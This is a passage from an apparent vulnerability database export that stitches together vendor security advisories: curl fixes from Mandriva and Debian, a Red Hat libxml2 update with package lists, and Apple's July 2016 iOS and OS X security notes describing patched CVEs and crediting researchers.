v1\n\niD8DBQFWTkDjXlSAg2UNWIIRAiUIAKCDiD6XED0dZ145uiyufkWCK1ogUACgnQTY\n3iELkxAEAUfZ3lJlUq4u7Uo=\n=rhuc\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n \n libcurl can in some circumstances re-use the wrong connection when\n asked to do transfers using other protocols than HTTP and FTP, causing\n a transfer that was initiated by an application to wrongfully re-use\n an existing connection to the same server that was authenticated\n using different credentials (CVE-2014-0138). \n \n libcurl incorrectly validates wildcard SSL certificates containing\n literal IP addresses, so under certain conditions, it would allow\n and use a wildcard match specified in the CN field, allowing a\n malicious server to participate in a MITM attack or just fool users\n into believing that it is a legitimate site (CVE-2014-0139). For this problem to trigger, the client application must use\n the numerical IP address in the URL to access the site (CVE-2014-3613). \n \n Symeon Paraschoudis discovered that the curl_easy_duphandle() function\n in cURL has a bug that can lead to libcurl eventually sending off\n sensitive data that was not intended for sending, while performing\n a HTTP POST operation. This bug requires CURLOPT_COPYPOSTFIELDS and\n curl_easy_duphandle() to be used in that order, and then the duplicate\n handle must be used to perform the HTTP POST. The curl command line\n tool is not affected by this problem as it does not use this sequence\n (CVE-2014-3707). \n \n When libcurl sends a request to a server via a HTTP proxy, it copies\n the entire URL into the request and sends if off. If the given URL\n contains line feeds and carriage returns those will be sent along to\n the proxy too, which allows the program to for example send a separate\n HTTP request injected embedded in the URL (CVE-2014-8150). \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0015\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0138\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0139\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3613\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3620\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3707\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8150\n http://advisories.mageia.org/MGASA-2014-0153.html\n http://advisories.mageia.org/MGASA-2014-0385.html\n http://advisories.mageia.org/MGASA-2014-0444.html\n http://advisories.mageia.org/MGASA-2015-0020.html\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Business Server 2/X86_64:\n 498d59be3a6a4ace215c0d98fb4abede mbs2/x86_64/curl-7.34.0-3.1.mbs2.x86_64.rpm\n 75a821b73a75ca34f1747a0f7479267f mbs2/x86_64/curl-examples-7.34.0-3.1.mbs2.noarch.rpm\n f5d3aad5f0fd9db68b87c648aaabbb4a mbs2/x86_64/lib64curl4-7.34.0-3.1.mbs2.x86_64.rpm\n 4f356a2c97f9f64124b4e8ebe307826a mbs2/x86_64/lib64curl-devel-7.34.0-3.1.mbs2.x86_64.rpm \n d010a357d76a8eb967c7c52f92fb35ae mbs2/SRPMS/curl-7.34.0-3.1.mbs2.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 7.26.0-1+wheezy10. \n\nFor the testing distribution (jessie), these problems have been fixed in\nversion 7.38.0-1. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 7.38.0-1. \n\nWe recommend that you upgrade your curl packages",
"sources": [
{
"db": "NVD",
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"id": "JVNDB-2014-005511",
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{
"date": "2014-11-18T15:59:00.140000",
"db": "NVD",
"id": "CVE-2014-3613",
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{
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{
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"db": "BID",
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}
VAR-201606-0395
Vulnerability from variot - Updated: 2026-04-10 23:15The xmlParseElementDecl function in parser.c in libxml2 before 2.9.4 allows context-dependent attackers to cause a denial of service (heap-based buffer underread and application crash) via a crafted file, involving xmlParseName. Libxml2 is a C language-based function library for parsing XML documents developed by the GNOME project team. It supports multiple encoding formats, XPath analysis, Well-formed and valid verification, etc. There is a security vulnerability in the 'xmlParseElementDecl' function in the parser.c file of Libxml2 2.9.3 and earlier. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: libxml2 security update Advisory ID: RHSA-2016:1292-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2016:1292 Issue date: 2016-06-23 CVE Names: CVE-2016-1762 CVE-2016-1833 CVE-2016-1834 CVE-2016-1835 CVE-2016-1836 CVE-2016-1837 CVE-2016-1838 CVE-2016-1839 CVE-2016-1840 CVE-2016-3627 CVE-2016-3705 CVE-2016-4447 CVE-2016-4448 CVE-2016-4449 =====================================================================
- Summary:
An update for libxml2 is now available for Red Hat Enterprise Linux 6 and Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
The libxml2 library is a development toolbox providing the implementation of various XML standards.
Security Fix(es):
A heap-based buffer overflow flaw was found in the way libxml2 parsed certain crafted XML input. (CVE-2016-1834, CVE-2016-1840)
Multiple denial of service flaws were found in libxml2. (CVE-2016-1762, CVE-2016-1833, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837, CVE-2016-1838, CVE-2016-1839, CVE-2016-3627, CVE-2016-3705, CVE-2016-4447, CVE-2016-4448, CVE-2016-4449)
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all applications linked to the libxml2 library must be restarted, or the system rebooted.
- Bugs fixed (https://bugzilla.redhat.com/):
1319829 - CVE-2016-3627 libxml2: stack exhaustion while parsing xml files in recovery mode 1332443 - CVE-2016-3705 libxml2: stack overflow before detecting invalid XML file 1338682 - CVE-2016-1833 libxml2: Heap-based buffer overread in htmlCurrentChar 1338686 - CVE-2016-4447 libxml2: Heap-based buffer underreads due to xmlParseName 1338691 - CVE-2016-1835 libxml2: Heap use-after-free in xmlSAX2AttributeNs 1338696 - CVE-2016-1837 libxml2: Heap use-after-free in htmlPArsePubidLiteral and htmlParseSystemiteral 1338700 - CVE-2016-4448 libxml2: Format string vulnerability 1338701 - CVE-2016-4449 libxml2: Inappropriate fetch of entities content 1338702 - CVE-2016-1836 libxml2: Heap use-after-free in xmlDictComputeFastKey 1338703 - CVE-2016-1839 libxml2: Heap-based buffer overread in xmlDictAddString 1338705 - CVE-2016-1838 libxml2: Heap-based buffer overread in xmlPArserPrintFileContextInternal 1338706 - CVE-2016-1840 libxml2: Heap-buffer-overflow in xmlFAParserPosCharGroup 1338708 - CVE-2016-1834 libxml2: Heap-buffer-overflow in xmlStrncat 1338711 - CVE-2016-1762 libxml2: Heap-based buffer-overread in xmlNextChar
- Package List:
Red Hat Enterprise Linux HPC Node (v. 6):
Source: libxml2-2.7.6-21.el6_8.1.src.rpm
x86_64: libxml2-2.7.6-21.el6_8.1.i686.rpm libxml2-2.7.6-21.el6_8.1.x86_64.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm libxml2-python-2.7.6-21.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64: libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm libxml2-devel-2.7.6-21.el6_8.1.i686.rpm libxml2-devel-2.7.6-21.el6_8.1.x86_64.rpm libxml2-static-2.7.6-21.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: libxml2-2.7.6-21.el6_8.1.src.rpm
i386: libxml2-2.7.6-21.el6_8.1.i686.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm libxml2-devel-2.7.6-21.el6_8.1.i686.rpm libxml2-python-2.7.6-21.el6_8.1.i686.rpm
ppc64: libxml2-2.7.6-21.el6_8.1.ppc.rpm libxml2-2.7.6-21.el6_8.1.ppc64.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.ppc.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.ppc64.rpm libxml2-devel-2.7.6-21.el6_8.1.ppc.rpm libxml2-devel-2.7.6-21.el6_8.1.ppc64.rpm libxml2-python-2.7.6-21.el6_8.1.ppc64.rpm
s390x: libxml2-2.7.6-21.el6_8.1.s390.rpm libxml2-2.7.6-21.el6_8.1.s390x.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.s390.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.s390x.rpm libxml2-devel-2.7.6-21.el6_8.1.s390.rpm libxml2-devel-2.7.6-21.el6_8.1.s390x.rpm libxml2-python-2.7.6-21.el6_8.1.s390x.rpm
x86_64: libxml2-2.7.6-21.el6_8.1.i686.rpm libxml2-2.7.6-21.el6_8.1.x86_64.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm libxml2-devel-2.7.6-21.el6_8.1.i686.rpm libxml2-devel-2.7.6-21.el6_8.1.x86_64.rpm libxml2-python-2.7.6-21.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm libxml2-static-2.7.6-21.el6_8.1.i686.rpm
ppc64: libxml2-debuginfo-2.7.6-21.el6_8.1.ppc64.rpm libxml2-static-2.7.6-21.el6_8.1.ppc64.rpm
s390x: libxml2-debuginfo-2.7.6-21.el6_8.1.s390x.rpm libxml2-static-2.7.6-21.el6_8.1.s390x.rpm
x86_64: libxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm libxml2-static-2.7.6-21.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: libxml2-2.7.6-21.el6_8.1.src.rpm
i386: libxml2-2.7.6-21.el6_8.1.i686.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm libxml2-devel-2.7.6-21.el6_8.1.i686.rpm libxml2-python-2.7.6-21.el6_8.1.i686.rpm
x86_64: libxml2-2.7.6-21.el6_8.1.i686.rpm libxml2-2.7.6-21.el6_8.1.x86_64.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm libxml2-devel-2.7.6-21.el6_8.1.i686.rpm libxml2-devel-2.7.6-21.el6_8.1.x86_64.rpm libxml2-python-2.7.6-21.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm libxml2-static-2.7.6-21.el6_8.1.i686.rpm
x86_64: libxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm libxml2-static-2.7.6-21.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source: libxml2-2.9.1-6.el7_2.3.src.rpm
x86_64: libxml2-2.9.1-6.el7_2.3.i686.rpm libxml2-2.9.1-6.el7_2.3.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm libxml2-python-2.9.1-6.el7_2.3.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm libxml2-devel-2.9.1-6.el7_2.3.i686.rpm libxml2-devel-2.9.1-6.el7_2.3.x86_64.rpm libxml2-static-2.9.1-6.el7_2.3.i686.rpm libxml2-static-2.9.1-6.el7_2.3.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: libxml2-2.9.1-6.el7_2.3.src.rpm
x86_64: libxml2-2.9.1-6.el7_2.3.i686.rpm libxml2-2.9.1-6.el7_2.3.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm libxml2-python-2.9.1-6.el7_2.3.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm libxml2-devel-2.9.1-6.el7_2.3.i686.rpm libxml2-devel-2.9.1-6.el7_2.3.x86_64.rpm libxml2-static-2.9.1-6.el7_2.3.i686.rpm libxml2-static-2.9.1-6.el7_2.3.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: libxml2-2.9.1-6.el7_2.3.src.rpm
ppc64: libxml2-2.9.1-6.el7_2.3.ppc.rpm libxml2-2.9.1-6.el7_2.3.ppc64.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.ppc.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.ppc64.rpm libxml2-devel-2.9.1-6.el7_2.3.ppc.rpm libxml2-devel-2.9.1-6.el7_2.3.ppc64.rpm libxml2-python-2.9.1-6.el7_2.3.ppc64.rpm
ppc64le: libxml2-2.9.1-6.el7_2.3.ppc64le.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.ppc64le.rpm libxml2-devel-2.9.1-6.el7_2.3.ppc64le.rpm libxml2-python-2.9.1-6.el7_2.3.ppc64le.rpm
s390x: libxml2-2.9.1-6.el7_2.3.s390.rpm libxml2-2.9.1-6.el7_2.3.s390x.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.s390.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.s390x.rpm libxml2-devel-2.9.1-6.el7_2.3.s390.rpm libxml2-devel-2.9.1-6.el7_2.3.s390x.rpm libxml2-python-2.9.1-6.el7_2.3.s390x.rpm
x86_64: libxml2-2.9.1-6.el7_2.3.i686.rpm libxml2-2.9.1-6.el7_2.3.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm libxml2-devel-2.9.1-6.el7_2.3.i686.rpm libxml2-devel-2.9.1-6.el7_2.3.x86_64.rpm libxml2-python-2.9.1-6.el7_2.3.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: libxml2-debuginfo-2.9.1-6.el7_2.3.ppc.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.ppc64.rpm libxml2-static-2.9.1-6.el7_2.3.ppc.rpm libxml2-static-2.9.1-6.el7_2.3.ppc64.rpm
ppc64le: libxml2-debuginfo-2.9.1-6.el7_2.3.ppc64le.rpm libxml2-static-2.9.1-6.el7_2.3.ppc64le.rpm
s390x: libxml2-debuginfo-2.9.1-6.el7_2.3.s390.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.s390x.rpm libxml2-static-2.9.1-6.el7_2.3.s390.rpm libxml2-static-2.9.1-6.el7_2.3.s390x.rpm
x86_64: libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm libxml2-static-2.9.1-6.el7_2.3.i686.rpm libxml2-static-2.9.1-6.el7_2.3.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: libxml2-2.9.1-6.el7_2.3.src.rpm
x86_64: libxml2-2.9.1-6.el7_2.3.i686.rpm libxml2-2.9.1-6.el7_2.3.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm libxml2-devel-2.9.1-6.el7_2.3.i686.rpm libxml2-devel-2.9.1-6.el7_2.3.x86_64.rpm libxml2-python-2.9.1-6.el7_2.3.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm libxml2-static-2.9.1-6.el7_2.3.i686.rpm libxml2-static-2.9.1-6.el7_2.3.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2016-1762 https://access.redhat.com/security/cve/CVE-2016-1833 https://access.redhat.com/security/cve/CVE-2016-1834 https://access.redhat.com/security/cve/CVE-2016-1835 https://access.redhat.com/security/cve/CVE-2016-1836 https://access.redhat.com/security/cve/CVE-2016-1837 https://access.redhat.com/security/cve/CVE-2016-1838 https://access.redhat.com/security/cve/CVE-2016-1839 https://access.redhat.com/security/cve/CVE-2016-1840 https://access.redhat.com/security/cve/CVE-2016-3627 https://access.redhat.com/security/cve/CVE-2016-3705 https://access.redhat.com/security/cve/CVE-2016-4447 https://access.redhat.com/security/cve/CVE-2016-4448 https://access.redhat.com/security/cve/CVE-2016-4449 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
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-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .
For the stable distribution (jessie), these problems have been fixed in version 2.9.1+dfsg1-5+deb8u2. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
APPLE-SA-2016-07-18-2 iOS 9.3.3
iOS 9.3.3 is now available and addresses the following:
Calendar Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A maliciously crafted calendar invite may cause a device to unexpectedly restart Description: A null pointer dereference was addressed through improved memory handling. CVE-2016-4592 : Mikhail
WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a malicious website may disclose image data from another website Description: A timing issue existed in the processing of SVG. CVE-2016-4587 : Apple
WebKit JavaScript Bindings Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may lead to script execution in the context of a non-HTTP service Description: A cross-protocol cross-site scripting (XPXSS) issue existed in Safari when submitting forms to non-HTTP services compatible with HTTP/0.9. This issue was addressed by disabling scripts and plugins on resources loaded over HTTP/0.9. CVE-2016-4651 : Obscure
WebKit Page Loading Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious website may exfiltrate data cross-origin Description: A cross-site scripting issue existed in Safari URL redirection. CVE-2016-4585 : Takeshi Terada of Mitsui Bussan Secure Directions, Inc. CVE-2016-4584 : Chris Vienneau
Installation note:
This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
- Navigate to Settings
- Select General
- Select About. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
APPLE-SA-2016-07-18-1 OS X El Capitan v10.11.6 and Security Update 2016-004
OS X El Capitan v10.11.6 and Security Update 2016-004 is now available and addresses the following:
apache_mod_php
Available for:
OS X Yosemite v10.10.5 and OS X El Capitan v10.11 and later
Impact: A remote attacker may be able to execute arbitrary code
Description: Multiple issues existed in PHP versions prior to
5.5.36. These were addressed by updating PHP to version 5.5.36.
CVE-2016-4650
Audio Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved memory handling. CVE-2016-4647 : Juwei Lin (@fuzzerDOTcn) of Trend Micro
Audio Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to determine kernel memory layout Description: An out-of-bounds read was addressed through improved input validation. CVE-2016-4648 : Juwei Lin(@fuzzerDOTcn) of Trend Micro
Audio Available for: OS X El Capitan v10.11 and later Impact: Parsing a maliciously crafted audio file may lead to the disclosure of user information Description: An out-of-bounds read was addressed through improved bounds checking. CVE-2016-4646 : Steven Seeley of Source Incite working with Trend Micro's Zero Day Initiative
Audio Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to cause a system denial of service Description: A null pointer dereference was addressed through improved input validation. CVE-2016-4649 : Juwei Lin(@fuzzerDOTcn) of Trend Micro
bsdiff Available for: OS X El Capitan v10.11 and later Impact: A local attacker may be able to cause unexpected application termination or arbitrary code execution Description: An integer overflow existed in bspatch. This issue was addressed through improved bounds checking. CVE-2014-9862 : an anonymous researcher
CFNetwork Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to view sensitive user information Description: A permissions issue existed in the handling of web browser cookies. This issue was addressed through improved restrictions. CVE-2016-4645 : Abhinav Bansal of Zscaler Inc.
CoreGraphics Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: A memory corruption issue was addressed through improved memory handling. CVE-2016-4637 : Tyler Bohan of Cisco Talos (talosintel.com /vulnerability-reports)
CoreGraphics Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to elevate privileges Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation. CVE-2016-4652 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative
FaceTime Available for: OS X El Capitan v10.11 and later Impact: An attacker in a privileged network position may be able to cause a relayed call to continue transmitting audio while appearing as if the call terminated Description: User interface inconsistencies existed in the handling of relayed calls. These issues were addressed through improved FaceTime display logic. CVE-2016-4635 : Martin Vigo
Graphics Drivers Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4634 : Stefan Esser of SektionEins
ImageIO Available for: OS X El Capitan v10.11 and later Impact: A remote attacker may be able to cause a denial of service Description: A memory consumption issue was addressed through improved memory handling. CVE-2016-4632 : Evgeny Sidorov of Yandex
ImageIO Available for: OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4631 : Tyler Bohan of Cisco Talos (talosintel.com /vulnerability-reports)
ImageIO Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4629 : Tyler Bohan of Cisco Talos (talosintel.com /vulnerability-reports) CVE-2016-4630 : Tyler Bohan of Cisco Talos (talosintel.com /vulnerability-reports)
Intel Graphics Driver Available for: OS X El Capitan v10.11 and later Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4633 : an anonymous researcher
IOHIDFamily Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A null pointer dereference was addressed through improved input validation. CVE-2016-4626 : Stefan Esser of SektionEins
IOSurface Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A use-after-free was addressed through improved memory management. CVE-2016-4625 : Ian Beer of Google Project Zero
Kernel Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-1863 : Ian Beer of Google Project Zero CVE-2016-1864 : Ju Zhu of Trend Micro CVE-2016-4582 : Shrek_wzw and Proteas of Qihoo 360 Nirvan Team
Kernel Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to cause a system denial of service Description: A null pointer dereference was addressed through improved input validation. CVE-2016-1865 : CESG, Marco Grassi (@marcograss) of KeenLab (@keen_lab), Tencent
libc++abi Available for: OS X El Capitan v10.11 and later Impact: An application may be able to execute arbitrary code with root privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4621 : an anonymous researcher
libexpat Available for: OS X El Capitan v10.11 and later Impact: Processing maliciously crafted XML may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-0718 : Gustavo Grieco
LibreSSL Available for: OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: Multiple issues existed in LibreSSL before 2.2.7. These were addressed by updating LibreSSL to version 2.2.7. CVE-2016-2108 : Huzaifa Sidhpurwala (Red Hat), Hanno Boeck, David Benjamin (Google) Mark Brand, Ian Beer of Google Project Zero CVE-2016-2109 : Brian Carpenter
libxml2 Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: Parsing a maliciously crafted XML document may lead to disclosure of user information Description: An access issue existed in the parsing of maliciously crafted XML files. This issue was addressed through improved input validation. CVE-2016-4449 : Kostya Serebryany
libxml2 Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: Multiple vulnerabilities in libxml2 Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-1836 : Wei Lei and Liu Yang of Nanyang Technological University CVE-2016-4447 : Wei Lei and Liu Yang of Nanyang Technological University CVE-2016-4448 : Apple CVE-2016-4483 : Gustavo Grieco CVE-2016-4614 : Nick Wellnhofe CVE-2016-4615 : Nick Wellnhofer CVE-2016-4616 : Michael Paddon CVE-2016-4619 : Hanno Boeck
libxslt Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: Multiple vulnerabilities in libxslt Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-1684 : Nicolas GrA(c)goire CVE-2016-4607 : Nick Wellnhofer CVE-2016-4608 : Nicolas GrA(c)goire CVE-2016-4609 : Nick Wellnhofer CVE-2016-4610 : Nick Wellnhofer CVE-2016-4612 : Nicolas GrA(c)goire
Login Window Available for: OS X El Capitan v10.11 and later Impact: A malicious application may be able to execute arbitrary code leading to compromise of user information Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4640 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative
Login Window Available for: OS X El Capitan v10.11 and later Impact: A malicious application may be able to execute arbitrary code leading to the compromise of user information Description: A type confusion issue was addressed through improved memory handling. CVE-2016-4641 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative
Login Window Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to cause a denial of service Description: A memory initialization issue was addressed through improved memory handling. CVE-2016-4639 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative
Login Window Available for: OS X El Capitan v10.11 and later Impact: A malicious application may be able to gain root privileges Description: A type confusion issue was addressed through improved memory handling. CVE-2016-4638 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative
OpenSSL Available for: OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: Multiple issues existed in OpenSSL. These issues were resolved by backporting the fixes from OpenSSL 1.0.2h/1.0.1 to OpenSSL 0.9.8. CVE-2016-2105 : Guido Vranken CVE-2016-2106 : Guido Vranken CVE-2016-2107 : Juraj Somorovsky CVE-2016-2108 : Huzaifa Sidhpurwala (Red Hat), Hanno Boeck, David Benjamin (Google), Mark Brand and Ian Beer of Google Project Zero CVE-2016-2109 : Brian Carpenter CVE-2016-2176 : Guido Vranken
QuickTime Available for: OS X El Capitan v10.11 and later Impact: Processing a maliciously crafted FlashPix Bitmap Image may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4596 : Ke Liu of Tencent's Xuanwu Lab CVE-2016-4597 : Ke Liu of Tencent's Xuanwu Lab CVE-2016-4600 : Ke Liu of Tencent's Xuanwu Lab CVE-2016-4602 : Ke Liu of Tencent's Xuanwu Lab
QuickTime Available for: OS X El Capitan v10.11 and later Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4598 : Ke Liu of Tencent's Xuanwu Lab
QuickTime Available for: OS X El Capitan v10.11 and later Impact: Processing a maliciously crafted SGI file may lead to arbitrary code execution Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4601 : Ke Liu of Tencent's Xuanwu Lab
QuickTime Available for: OS X El Capitan v10.11 and later Impact: Processing a maliciously crafted Photoshop document may lead to unexpected application termination or arbitrary code execution Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4599 : Ke Liu of Tencent's Xuanwu Lab
